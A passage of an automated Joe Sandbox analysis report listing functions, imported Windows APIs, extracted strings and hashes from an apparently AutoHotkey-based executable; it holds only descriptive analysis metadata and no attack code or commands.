APIs

Part of subcall function 00000001400CAB74: _errno.LIBCMT ref: 00000001400CAB92
Part of subcall function 00000001400CAB74: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CAB9D

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Strings

Float, xrefs: 000000014003823F
Integer, xrefs: 000000014003832C
%%%s%s%s, xrefs: 0000000140038315

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: %%%s%s%s$Float$Integer
API String ID: 130734711-2931010843
Opcode ID: 3de39754bbb8a91c047c906dacb25b23fe9819f7d9e596eb34db751b8ead5856
Instruction ID: 8dc8d90c5fb2f1347c5d65d08f156a7567831a2b358138a18f47a6d00b83f320
Opcode Fuzzy Hash: 3de39754bbb8a91c047c906dacb25b23fe9819f7d9e596eb34db751b8ead5856
Instruction Fuzzy Hash: 25B18B31205B4086FB6B8B27E8947EA77A1B74DBD4F540116FB5A876F5DB38C880C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037BEE Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 224
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014008C0A0: free.LIBCMT ref: 000000014008C0CD

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetLastError.KERNEL32 ref: 0000000140037C96

Strings

Parameter #1 invalid., xrefs: 0000000140037CAA
Press OK to continue., xrefs: 0000000140037C33

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseErrorGlobalLastMessagePeekUnlockfree
String ID: Parameter #1 invalid.$Press OK to continue.
API String ID: 2434512724-108709617
Opcode ID: b3e613c62b5422ce961cbc385aef539ae5464c67cef198828a281a9f89896451
Instruction ID: d07b8fb80a25cd0d96599d1df8f33114051de0a463f8559f55a56e0e05a480fb
Opcode Fuzzy Hash: b3e613c62b5422ce961cbc385aef539ae5464c67cef198828a281a9f89896451
Instruction Fuzzy Hash: 8FB17F32604B4486FB6B8B27E8907EA67A1F74DBE4F540116FB5A47AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400053F0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.LIBCMT ref: 000000014000551D

Part of subcall function 00000001400CA91C: _errno.LIBCMT ref: 00000001400CA934
Part of subcall function 00000001400CA91C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CA93F

Part of subcall function 00000001400CAB74: _errno.LIBCMT ref: 00000001400CAB92
Part of subcall function 00000001400CAB74: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CAB9D

Strings

A_Args, xrefs: 00000001400054FB, 00000001400055C7
Out of memory., xrefs: 000000014001EE3A, 000000014001EF1D
/ErrorStdOut, xrefs: 0000000140005477
/restart, xrefs: 000000014000543E
/force, xrefs: 0000000140005464
=, xrefs: 0000000140005490

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$wcsncpy
String ID: /ErrorStdOut$/force$/restart$=$A_Args$Out of memory.
API String ID: 3818259516-673611611
Opcode ID: ec19a6a06cb02f366bdee82cf9a523ecbdf44ce6dfe4094d848e935c2be9526b
Instruction ID: 751609671aba6611be446afd5e0fc0c4ca0573d1f5ff84674f8ab6cd321f7fa6
Opcode Fuzzy Hash: ec19a6a06cb02f366bdee82cf9a523ecbdf44ce6dfe4094d848e935c2be9526b
Instruction Fuzzy Hash: CFD1AC72205B8581EA26DB26E8443DE63A1F78D7D8F880211FB4D4B6E9EF7DC649C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400388CF Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 233
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Strings

%s\%s, xrefs: 00000001400388F7
ahk_default, xrefs: 000000014003899D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: %s\%s$ahk_default
API String ID: 1623861271-75935552
Opcode ID: 7f54181938fa6dd6b2ca4d7d7e30e5037256e33b2bc02bdb2bf648ecc0cb6066
Instruction ID: f0f5f52bb075880dc459a98bc6115b518e2fc0c452e5c9740d08abc663d87789
Opcode Fuzzy Hash: 7f54181938fa6dd6b2ca4d7d7e30e5037256e33b2bc02bdb2bf648ecc0cb6066
Instruction Fuzzy Hash: 4DB16E32204B4486FB67CB27E8447EA67A1F74DBD4F584116EB9947AF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D2614 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400D267A
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D2685
_wsopen_s.LIBCMT ref: 00000001400D28A4

Part of subcall function 00000001400CAB74: _errno.LIBCMT ref: 00000001400CAB92
Part of subcall function 00000001400CAB74: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CAB9D

Strings

UTF-8, xrefs: 00000001400D280D
UTF-16LE, xrefs: 00000001400D2830
=, xrefs: 00000001400D27F9
UNICODE, xrefs: 00000001400D2853
ccs, xrefs: 00000001400D27CC

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_wsopen_s
String ID: =$UNICODE$UTF-16LE$UTF-8$ccs
API String ID: 2449612375-31882262
Opcode ID: c21209d492e7823e4180e08be6558a3d4006f18815a6f4894d8be109b368a5ae
Instruction ID: 1572161f7d5f4941326572ac831e80753e07b38669738fe1ae81e8fc4e823b00
Opcode Fuzzy Hash: c21209d492e7823e4180e08be6558a3d4006f18815a6f4894d8be109b368a5ae
Instruction Fuzzy Hash: 0771F176A0831081FB774E27A8047FD1291AF7DBD8F594116FF0A23AF5D638C98396A1

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003634D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 181windowtimeclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
SendMessageTimeoutW.USER32 ref: 000000014003637C

Strings

Environment, xrefs: 0000000140036369

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID: Environment
API String ID: 3716859204-3233436149
Opcode ID: 8bc60ca8d758e9442f40f8790e9b4f09e40a09a7267d41fc112a7a271edf6435
Instruction ID: 336c89efc6efc6b21550bf28d556fb81e5759c76ef5d6f4db9944c7f296df1f6
Opcode Fuzzy Hash: 8bc60ca8d758e9442f40f8790e9b4f09e40a09a7267d41fc112a7a271edf6435
Instruction Fuzzy Hash: 23916032205B4486FB6B8B27E8947EA77A1F74DBE4F540116EB5947AF5DB38C881CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008A1A0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 315COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 000000014008A276
malloc.LIBCMT ref: 000000014008A28E

Strings

Out of memory., xrefs: 000000014008A2AC
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014008A214

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: freemalloc
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 3061335427-457448710
Opcode ID: 2d6363895a21a7d24569d45f10dc12e654b1b1bc4baff34a2c154c6e8dcbd625
Instruction ID: 56721556733193cb0086889d139faaee66658be3c45cd5c525be3dd50c05441b
Opcode Fuzzy Hash: 2d6363895a21a7d24569d45f10dc12e654b1b1bc4baff34a2c154c6e8dcbd625
Instruction Fuzzy Hash: 3DE19072605B8481FB628F16A4047EA77A5F78EBD8F440116EB9907BB8DB7CC695C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036178 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 270windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400CAB74: _errno.LIBCMT ref: 00000001400CAB92
Part of subcall function 00000001400CAB74: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CAB9D

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635

Strings

ahk_group, xrefs: 000000014003617E

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock_errno_invalid_parameter_noinfo
String ID: ahk_group
API String ID: 3495366681-1905535906
Opcode ID: 47ed002c1cfb8fd22f0a6c47f81526549c3b7e33e3c3d2ff48cbec5b37f452a3
Instruction ID: 8356ccc7eca21de094a521e1a5df97db06c56df3de194ce9d9265a4f8ed8c1a1
Opcode Fuzzy Hash: 47ed002c1cfb8fd22f0a6c47f81526549c3b7e33e3c3d2ff48cbec5b37f452a3
Instruction Fuzzy Hash: 44D16B32605B4086EB6B8B27E8403EA27A1F74DBD4F594116EB99477F9DB38C881C741

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400330B8 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 224windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400CA91C: _errno.LIBCMT ref: 00000001400CA934
Part of subcall function 00000001400CA91C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CA93F

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Strings

CSV, xrefs: 00000001400330B8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID: CSV
API String ID: 130734711-2651001053
Opcode ID: da9c5deefa4da5a1134f71f1d8619eb23c1d41c163f7a8435eba7ded7b6a137f
Instruction ID: 2688e86073e93982a699b87ea9918b52c7525f954c5c37f5e71567ca75bde2d6
Opcode Fuzzy Hash: da9c5deefa4da5a1134f71f1d8619eb23c1d41c163f7a8435eba7ded7b6a137f
Instruction Fuzzy Hash: B4B15E76605B448AEB678B27E8803EA77A1F74DBD4F140116EB9D87BB4DB38D881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400371B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 218windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Strings

Target label does not exist., xrefs: 000000014003720E

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Target label does not exist.
API String ID: 1623861271-2507343300
Opcode ID: b1ab25adb716a0340ef1acb592c6e6afda6ab95ef0c66e87294ced97402eb644
Instruction ID: 6c4aa3b4639a1d5b6c564e42c8e5f623f04f37a10ff2788b33068944f47b3f27
Opcode Fuzzy Hash: b1ab25adb716a0340ef1acb592c6e6afda6ab95ef0c66e87294ced97402eb644
Instruction Fuzzy Hash: DDB18B32205B4485FB6B8B2BE8847EA27A1F74DBE4F550116EB9947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400368D2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Strings

Parameter #4 invalid., xrefs: 00000001400368F0

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #4 invalid.
API String ID: 1623861271-2921795276
Opcode ID: 3483005053c314ee9448fd2db6387cdc1c16f771e4bd3309f19a79656cddea83
Instruction ID: 7f91fe8d357328212043f1c478c7fa81a1cce7258ec385919f0ef88df1e43d0a
Opcode Fuzzy Hash: 3483005053c314ee9448fd2db6387cdc1c16f771e4bd3309f19a79656cddea83
Instruction Fuzzy Hash: C2A14D32205B4486EB6B8B27E8907DA77A1F74DBE4F540116EB9A47BF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038498 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Strings

Parameter #1 invalid., xrefs: 0000000140038A45

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Parameter #1 invalid.
API String ID: 1623861271-1208927624
Opcode ID: 485a2810ade87809526e0fed66b171340546cdec0d0a94dfeec7b759600275e0
Instruction ID: b22c8198679ed27f25c45896b9bef3f2e1047a73a02d4717c7e775b785140715
Opcode Fuzzy Hash: 485a2810ade87809526e0fed66b171340546cdec0d0a94dfeec7b759600275e0
Instruction Fuzzy Hash: 48916D32605B4086FB6B8B27E8847EA27A1F74DBE4F544116FB5987AF5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036E78 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 188windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Strings

Target label does not exist., xrefs: 0000000140036E9E

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: Target label does not exist.
API String ID: 1623861271-2507343300
Opcode ID: 0b1c5d94bcc1ee1b2cc0673c84cfb5f580d17ec7af2a49d259f278cca100095f
Instruction ID: 3c9554a7e96362e474684c4a2768a9baf587521b7d5b6d890f893d3d76f2c67d
Opcode Fuzzy Hash: 0b1c5d94bcc1ee1b2cc0673c84cfb5f580d17ec7af2a49d259f278cca100095f
Instruction Fuzzy Hash: 16915D32205B4486FB6B8B27E8947EA37A1F74DBE4F544116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400375FD Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Part of subcall function 00000001400CA91C: _errno.LIBCMT ref: 00000001400CA934
Part of subcall function 00000001400CA91C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CA93F

Strings

wait, xrefs: 000000014003760A

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
